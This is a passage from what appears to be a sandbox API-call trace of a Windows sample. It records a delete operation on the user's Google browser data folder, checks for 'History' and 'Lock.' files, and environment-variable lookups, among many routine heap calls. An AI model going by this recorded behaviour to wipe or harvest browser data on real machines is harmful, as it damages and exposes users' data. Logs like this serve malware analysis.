⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Google", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0168.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0168.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0168.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0168.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0168.179] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0168.207] TranslateMessage (lpMsg=0x8cf968) returned 0 [0168.207] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0168.207] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0168.207] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0168.208] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0168.210] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.210] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0168.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0168.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0168.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0168.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0168.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0168.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0168.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0168.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0168.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0168.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0168.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0168.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="History", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0168.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="istory", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0168.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="story", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0168.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0168.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0168.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0168.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0168.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0168.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0168.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0168.211] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0168.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0168.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0168.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0168.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0168.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0168.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0168.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0168.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0168.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0168.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0168.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0168.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0168.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0168.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0168.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0168.212] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="History", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0168.212] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="istory", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0168.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0168.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0168.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0168.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0168.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0168.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0168.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0168.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0168.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0168.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0168.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0168.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0168.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0168.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0168.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0168.213] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0168.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0168.213] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0168.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0168.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0168.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0168.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721b8 [0168.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0168.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0168.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0168.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0168.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0168.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0168.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0168.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0168.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0168.213] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0168.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0168.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0168.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa798 [0168.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0168.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0168.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5e8 [0168.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0168.214] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0168.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0168.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0168.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0168.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0168.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0168.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0168.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0168.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0168.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0168.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0168.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0168.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0168.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0168.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0168.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0168.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0168.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0168.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0168.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0168.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0168.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0168.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0168.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0168.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0168.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0168.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0168.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0168.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0168.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0168.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0168.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0168.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0168.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0168.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0168.217] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0168.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0168.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0168.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa768 [0168.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0168.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0168.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa570 [0168.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0168.217] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0168.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0168.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0168.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0168.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0168.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0168.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0168.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0168.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0168.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0168.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0168.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0168.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0168.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0168.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0168.218] RtlAllocateHeap 